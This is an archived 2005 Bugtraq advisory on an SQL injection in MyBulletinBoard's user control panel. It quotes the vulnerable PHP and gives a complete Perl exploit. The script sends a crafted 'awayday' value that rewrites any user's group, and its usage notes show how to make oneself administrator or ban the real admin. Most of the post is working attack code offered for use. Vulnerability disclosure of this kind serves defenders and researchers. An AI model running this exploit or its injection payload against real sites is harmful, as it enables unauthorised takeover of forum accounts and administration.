SQL-Injection in MyBulletinBoard allows attacker to become a board admin.

From: Animal (cOre_at_xaker.ru)
Date: 10/26/05

  • Next message: Paul Laudanski: "phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit." 
    To: bugtraq@securityfocus.com
Date: Wed, 26 Oct 2005 13:01:31 +0500

    Vendor: www.mybboard.com
    Version: 1.00 Preview Release 2, RC4 and mayb prior.
    Script: usercp.php
    Code:
    > if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] !=
    > "no")
    > {
    > [...]
    > $returndate =
    > $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
    > [...]
    > $newprofile = array(
    > "website" =>
    > addslashes(htmlspecialchars($mybb->input['website'])),
    > "icq" => intval($mybb->input['icq']),
    > "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
    > "yahoo" =>
    > addslashes(htmlspecialchars($mybb->input['yahoo'])),
    > "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
    > "birthday" => $bday,
    > "away" => $away,
    > "awaydate" => $awaydate,
    > "returndate" => $returndate, // <--- not checked (bday
    > too, but anyway)
    > "awayreason" =>
    > addslashes(htmlspecialchars($mybb->input['awayreason']))
    > );
    > [...]
    > $db->update_query(TABLE_PREFIX."users", $newprofile,
    > "uid='".$mybb->user['uid']."'");
    So: Attacker can replace "awayday" param by some SQL code and change any
    field in _users table.
         Changing "usergroup" for his "uid" to 4 makes him an admin. To use
    this bug attacker have to be
         a registered/awayting_activation user.

    Proof of concept: (For PR2 only)
    --<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
    #!/usr/bin/perl

    ### MyBB Preview Release 2 SQL-Injection PoC ExPlOiT ###
    ### ------------------------------------------------ ###
    ### To use this you have to be registered member on ###
    ### a target. ###
    ### ------------------------------------------------ ###
    ### Glossary: ###
    ### [MYBBUSER] - name of the field in cookie; ###
    ### [YOUR_ID] - your uid :) ###
    ### [ID] - victim uid ###
    ### Available groups: ###
    ### 1 - Unregistered / Not Logged In ###
    ### 2 - Registered ###
    ### 3 - Super Moderators ###
    ### 4 - Administrators ###
    ### 5 - Awayting Activation ###
    ### 6 - Moderators ###
    ### 7 - Banned ###
    ### ------------------------------------------------ ###
    ### Examples: ###
    ### 1) TROUBLE --> U need an admin privileges. ###
    ### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ###
    ### [YOUR_ID] -g 4 server /mybb/ ###
    ### 2) TROUBLE --> U need to ban real admin. ###
    ### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ###
    ### [ID] -g 7 server /mybb/ ###

    use IO::Socket;

    $tmp=0;

    while($tmp<@ARGV)
    {
      if($ARGV[$tmp] eq "-u")
       {
        $mbuser=$ARGV[$tmp+1];
        $tmp++;
       }
      if($ARGV[$tmp] eq "-i")
       {
        $id=$ARGV[$tmp+1];
        $tmp++;
       }
      if($ARGV[$tmp] eq "-g")
       {
        $ugr=$ARGV[$tmp+1];
        $tmp++;
       }
      if($ARGV[$tmp] eq "-h")
       {
        &f_help();
       }
      $tmp++;
    }

    $target=$ARGV[@ARGV-2];
    $path =$ARGV[@ARGV-1];

    if(!$mbuser || !$id || !$ugr)
    {
      &f_die("Some options aren't specified");
    }
    print "\r\n Attacking http://$target\r\n";

    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",
    PeerPort => "80") || &f_die("Can't connect to $target");
    $str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

    print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept:
    */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type:
    application/x-www-form-urlencoded\nContent-Length:
    ".length($str)."\n\n$str\n";
    while(<$sock>)
    {
      if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n
    Just check it.\r\n"; exit(0)}
    }
    print "\r\n Looks like exploit failed :[\r\n";

    #----------------------------------#
    # S u B r O u T i N e #
    #----------------------------------#

    sub f_help()
    {
    print q(
      Usage: mybbpr2.pl <OPTIONS> SERVER PATH
      Options:
       -u USERKEY mybbuser field from cookie.
       -i UID User's uid. (Change group 4 this user)
       -g GROUP New usergroup. (1-7)
       -h Displays this help.
       );
      exit(-1);
    }
    #'
    sub f_die($)
    {
      print "\r\nERROR: $_[0]\r\n";
      exit(-1);
    }
    --<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

    Found: 1-3 sept 2005. Don't remember.
    Updated package is available (i hope).

    ByE.

  • Next message: Paul Laudanski: "phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit."

    Relevant Pages

    • Re: WWII depth charges
      ... >> account I see have the sub trying to go really deep when he is ... >after the attacker had lost contact. ... told a news reporter about it, and the information was printed in a ...
      (sci.military.naval)
    • Re: WWII depth charges
      ... account I see have the sub trying to go really deep when he is attacked. ... Is it simply to try to find an inversion layer or was it much more difficult for the attacker to find him at greater depth? ...
      (sci.military.naval)
    • Re: WWII depth charges
      ... account I see have the sub trying to go really deep when he is ... much more difficult for the attacker to find him at greater depth? ...
      (sci.military.naval)